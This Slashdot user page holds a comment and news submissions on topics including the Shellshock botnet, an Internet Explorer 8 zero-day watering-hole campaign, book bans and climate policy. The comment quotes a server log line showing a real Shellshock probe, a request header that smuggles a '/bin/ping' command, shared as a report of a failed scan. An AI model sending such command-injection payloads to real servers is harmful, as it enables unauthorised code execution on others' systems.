Follow Slashdot stories on Twitter

 


Forgot your password?
Close
typodupeerror

Slashdot videos: Now with more Slashdot!

  • View

  • Discuss

  • Share

We've improved Slashdot's video section; now you can view our video interviews, product close-ups and site visits with all the usual Slashdot options to comment, share, etc. No more walled garden! It's a work in progress -- we hope you'll check it out (Learn more about the recent updates).

Check out Videos
×

Comment: Re:Only the beginning (Score 3, Informative) 236

by geckoFeet (#47999635) Attached to: First Shellshock Botnet Attacking Akamai, US DoD Networks

Yay! I have been scanned - but my little webserver doesn't run any cgi scripts, so they got 404'd. They were looking specifically for defaultwebpage.cgi:

root@stinky:/home/gecko# grep cgi /var/log/apache2/access*|egrep "};|}\s*;" /var/log/apache2/access.log:89.207.135.125 - - [25/Sep/2014:02:28:52 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 319 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

+ - Britain's Costliest Mistake?-> 2

Submitted by RoccamOccam
RoccamOccam (953524) writes "Five years after UK passage of the 2008 Climate Change Act, the chief proponent of the act, Nick Stern, has responded to "A Review of the Stern Review". The "Stern Review" was a massive economic assessment that helped convince Parliament that climate mitigation measures would be worth the cost.

The result was quite possibly the most expensive legislation ever passed by Parliament. However, it appears that Stern’s analysis may have been deeply flawed."
Link to Original Source

+ - The Shadowy Darknet will be the Only Truly World-wide Web->

Submitted by DavidGilbert99
DavidGilbert99 (2607235) writes "“The shadowy Darknet then will be the only truly world-wide web” — this is the view of Alexander Gostev, chief security expert at Kaspersky Lab who believes the fallout from Edward Snowden's leaks may lead at some point to the "collapse of the current Internet, which will break into dozens of national networks.""
Link to Original Source

+ - Increasing Number of Books Banned in the USA->

Submitted by vikingpower
vikingpower (768921) writes "Isabel Allende's The House of The Spirits. Sherman Alexie's The Absolutely True Diary of a Part-Time Indian. Alice Walker's The Color Purple. Toni Morrison's The Bluest Eye. Ralph Ellison's The Invisible Man.

What do all these titles have in common with each other ? Exactly, they are banned somewhere, on some school, in the USA. . Yes, in 2013. A project named The Kids' Right to Read ( by the National Coalition Against Censorship ) investigated three times the average number of incidents, adding to an overall rise in cases for the entire year, according to KRRP coordinator Acacia O'Connor. To date, KRRP has confronted 49 incidents in 29 states this year, a 53% increase in activity from 2012. During the second half of 2013, the project battled 31 new incidents, compared to only 14 in the same period last year.

"It has been a sprint since the beginning of the school year," O'Connor said. "We would settle one issue and wake up the next morning to find out another book was on the chopping block."

The NCAC also offers a Book Censorship Toolkit on its website. If such a toolkit is needed at all, does this indicate that intellectual freedom and free speech are ( slowly ) eroding in the USA ?"
Link to Original Source

+ - Samsung Galaxy S4 Security Vulnurability->

Submitted by olsmeister
olsmeister (1488789) writes "The Samsung KNOX enterprise security system (presumably a play on Ft Knox, the location of the United States Bullion Depository) contains a security vulnurability that could put both personal and business data at risk. This is according to a discovery by a Ph.D. student at the Ben Gurion University of the Negev in Israel. This is the security system used in Samsung's flagship Galaxy S4 phone, which Samsung hopes will allow it to compete with BlackBerry in government and enterprise applications. The flaw could allow attackers to access secure data, as well as load malicious applications."
Link to Original Source

+ - Medical records given to pharmacies are not constitutionally protected, says DEA-> 1

Submitted by schwit1
schwit1 (797399) writes "Like emails and documents stored in the cloud, your prescription medical records may have a tenuous right to privacy. In response to a lawsuit filed by the American Civil Liberties Union (ACLU) over the privacy of certain medical records, the US Drug Enforcement Administration (DEA) is arguing that citizens whose medical records are handed over to a pharmacy — or any other third-party — have "no expectation of privacy" for that information."
Link to Original Source

+ - Middle-click Paste? Not For Long

Submitted by Anonymous Coward
An anonymous reader writes "Select to copy and middle-click to paste. That's very convenient usability feature associated with UNIX graphical environments. But it is confusing for new users, so the ability to middle-click paste was briefly removed from GNOME 3.10. It was restored few days later, but with clear message: middle-click paste will be permanently removed from next GNOME version."

+ - How Old is the Average Country?->

Submitted by Daniel_Stuckey
Daniel_Stuckey (2647775) writes "I've crashed quite a few birthday parties lately, which has led to me not only botching the lyrics and the cadence of each birthday song, but aso guessing how old everyone is I'm hanging out with. Today is the United States' 237th birthday. And while people often remark that America is pretty young compared to other countries, aren't they actually flattering the 22nd oldest country in the world?

I did some calculations in Excel, using independence dates provided on About.com, and found the average age of a country is about 158.78 years old. Now, before anyone throws a tizzy about what makes a country a country, about nations, tribes, civilizations, ethnic categories, or about my makeshift methodology, keep in mind, I simply assessed 195 countries based on their political sovereignty. That is the occasion we're celebrating today, right? Try this map."
Link to Original Source

+ - Internet Explorer 0-day attacks on US nuke workers hit 9 other sites->

Submitted by SternisheFan
SternisheFan (2529412) writes "Ars reports:

Attacks exploiting a previously unknown and currently unpatched vulnerability in Microsoft's Internet Explorer browser have spread to at least nine other websites, including those run by a big European company operating in the aerospace, defense, and security industries as well as non-profit groups and institutes, security researchers said.

The revelation, from a blog post published Sunday by security firm AlienVault, means an attack campaign that surreptitiously installed malware on the computers of federal government workers involved in nuclear weapons research was broader and more ambitious than previously thought. Earlier reports identified only a website belonging to the US Department of Labor as redirecting to servers that exploited the zero-day remote-code vulnerability in IE version 8.

A separate blog post from security firm CrowdStrike said its researchers unearthed evidence suggesting that the campaign began in mid-March. Their analysis of logs from the malicious infrastructure used in the attacks revealed the IP addresses of visitors to the compromised sites. The logs showed addresses from 37 different countries, with 71 percent of them in the US, 11 percent in South/Southeast Asia, and 10 percent in Europe. CrowdStrike's data showed IP addresses before exploit code was run against the visitors' machines. Not all those visitors were likely compromised since the exploit code worked only against people using IE8.

CrowdStrike researchers seemed to concur with their counterparts from Invincea, who—as Ars reported on Friday—said the attacks at least in part targeted people working on sensitive government programs. Malicious links embedded in the Department of Labor website focused on webpages that dealt with illnesses suffered by employees and contractors developing atomic weapons for the Department of Energy. But they went on to say the campaign could be much broader.

"The specific Department of Labor website that was compromised provides information on a compensation program for energy workers who were exposed to uranium," CrowdStrike said. "Likely targets of interest for this site include energy-related US government entities, energy companies, and possibly companies in the extractive sector. Based on the other compromised sites other targeted entities are likely to include those interested in labor, international health and political issues, as well as entities in the defense sector."

Such "watering hole" attacks—which plant malware exploits on websites that are frequented by specific groups or people—have become a common technique in targeted attacks. Once compromised by the IE zero-day, computers are infected with a version of Poison Ivy, a backdoor tool that has been widely used in past espionage campaigns. The command-and-control servers used to communicate with infected machines show signs that they were set up by a Chinese hacking crew known as DeepPanda.

Microsoft confirmed the remote code-execution vulnerability on Friday night. Versions 6, 7, 9, and 10 of the browser are immune to these attacks, so anyone who can upgrade to one of the latest two versions should do so immediately or switch to a different browser. For anyone who absolutely can not move away from IE 8, company researchers recommend the following precautions:

Set Internet and local intranet security zone settings to "High" to block ActiveX

Controls and Active Scripting in these zones

This will help prevent exploitation but may affect usability; therefore, trusted sites should be added to the Internet Explorer Trusted Sites zone to minimize disruption. Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and local intranet security zones This will help prevent exploitation but can affect usability, so trusted sites should be added to the Internet Explorer Trusted Sites zone to minimize disruption.

Users can also install EMET—short for Enhanced Mitigation Experience Toolkit—which adds a variety of exploit mitigations and security defenses and is especially useful for users of older versions of Windows, such as XP.

Technical details about the "use after free" bug are available here from Rapid7. The security firm has already folded attack code exploiting the vulnerability into the Metasploit framework used by security professionals and hackers. Researchers at FireEye have also delved into the exploit circulating online. They found it uses "return oriented programming," a technique used to defeat data-execution prevention and other exploit mitigations. The FireEye researchers said they also verified the exploit works against IE8 on Windows 7.

Microsoft's advisory on Friday said researchers were still investigating the vulnerability. When the inquiry concludes, they will decide whether to release an unscheduled update or provide a fix as part of the company's regular patching cycle. Story updated to add details from FireEye in second-to-last paragraph"
Link to Original Source

To be a kind of moral Unix, he touched the hem of Nature's shift. -- Shelley

Close